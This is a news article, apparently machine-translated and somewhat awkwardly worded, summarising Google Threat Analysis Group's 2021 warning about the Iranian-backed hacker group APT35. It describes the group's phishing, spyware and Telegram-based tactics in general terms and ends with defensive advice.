Oct 15, 2021 11:17:00

Google announces official warning about Iranian government hacker organization

Threat Analysis Group (TAG), a group to prevent targeted attacks targeting Google services, has issued an official warning about the hacker organization 'APT35' which is said to be supported by the Iranian government. I issued it. In this official warning, TAG describes the technique used by APT35.

Countering threats from Iran

https://blog.google/threat-analysis-group/countering-threats-iran/

According to TAG, APT35 is a group of hackers who have been spying in favor of the Iranian government for many years, most recently launching a credible stuffing attack on the private email addresses of election officials during the 2020 US presidential election. He said he knew that. The attack method of APT35 revealed by TAG is as follows.

◆ Credential phishing attacks using hacked websites
In early 2021, APT35 hacked a website affiliated with a British university and sent an email asking them to attend a 'fake online seminar'. In order to participate in this fake online seminar, authentication information such as Google account and Microsoft account is required, and the authentication code of two-step verification sent to the device was also required.

The actual web page is below. You can see that you will be prompted to log in with your Google or Microsoft account.

According to TAG, APT35 has been attacking by the same method since around 2017, and government agencies, academic institutions, news organizations, NGOs, etc. are selected as the target of the attack.

◆ Distribution of spyware apps
In May 2020, TAG discovered that APT35 was trying to upload spyware to the Google Play store. The spyware that was about to be uploaded was disguised as VPN software, and when installed, confidential information such as call logs, text message contents, contacts, and location information was stolen. This VPN software was immediately detected and removed from the Google Play store before the user installed it, but in July 2021 it seems that similar apps were being distributed on application distribution platforms other than the Google Play store. .. The VPN software mixed with this spyware looks like this:

◆ Phishing attacks impersonating conference personnel
One of TAG's 'one of the most striking features of the APT35' is spoofing conference participants. APT35 was attacking by sending an untouched email about an existing Italian conference and sending an email containing a phishing link when the user responded. According to TAG, clicking the link in the second email will redirect you to your phishing domain. APT35 abuses URL shortening services to disguise URLs, and some of them also use a method of redirecting to a phishing site under the guise of Google Forms.

◆ Attack using Telegram's notification function
One of APT35's novel methods is to use Telegram, a privacy-focused SNS. APT35 embedded a phishing page in Javascript that notifies when a page is loaded on Telegram, and indiscriminately sent messages via public channels to extract

IP and locale. TAG reports to Telegram the BOT that APT35 used to send the message, and Telegram has already removed this BOT.

TAG encourages workspace administrators to take notifications about attack alerts seriously, participate in advanced protection programs if possible, and enable two-factor authentication.